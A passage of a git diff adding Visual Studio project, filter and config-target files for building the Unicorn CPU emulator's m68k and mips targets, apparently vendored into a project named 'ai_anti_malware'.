Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-m68k;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>m68k.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj.filters new file mode 100644 index 0000000..f348710 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/m68k-softmmu/m68k-softmmu.vcxproj.filters @@ -0,0 +1,110 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{45b613c4-9fdb-482c-b94f-0138ea9907c3}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{14f99bfc-becf-403c-9100-1612ab30a848}</UniqueIdentifier> + </Filter> + <Filter Include="hw\m68k"> + <UniqueIdentifier>{484590c4-abd5-4db4-8b06-b34087856c27}</UniqueIdentifier> + </Filter> + <Filter Include="target-m68k"> + <UniqueIdentifier>{476366de-d432-4ce4-8e04-64aa34326aa0}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{63d2e327-f759-4757-a44b-90513ce433f7}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{574ebec7-47db-49de-8f59-3365337e42a7}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\cpu-qom.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\helper.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\m68k-qreg.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-m68k\unicorn.h"> + <Filter>target-m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\m68k.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\hw\m68k\dummy_m68k.c"> + <Filter>hw\m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\cpu.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\helper.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\op_helper.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\translate.c"> + <Filter>target-m68k</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-m68k\unicorn.c"> + <Filter>target-m68k</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/config-target.h new file mode 100644 index 0000000..85a5f1b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/config-target.h @@ -0,0 +1,7 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ABI_MIPSO32 1 +#define TARGET_MIPS 1 +#define TARGET_NAME "mips" +#define TARGET_MIPS 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj new file mode 100644 index 0000000..0cc7b08 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mips.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{63050112-E486-4396-B5E4-303C3BC12D39}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mipssoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj.filters new file mode 100644 index 0000000..893a255 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips-softmmu/mips-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{723b39e0-f3cc-46d9-b9e8-6fe7e38bdf26}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{19efec2a-ac41-4941-9dfc-4937f91829b4}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{0784e023-e00c-4034-adc4-9b1ad07d2eb7}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{d60f24b3-d409-40d8-b7d2-f3e71960841a}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{1c2a8ce7-cc6f-41e8-b532-a2f030f6799d}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{65e8fb9c-fe61-4100-9f0e-1eab5babb4d3}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude 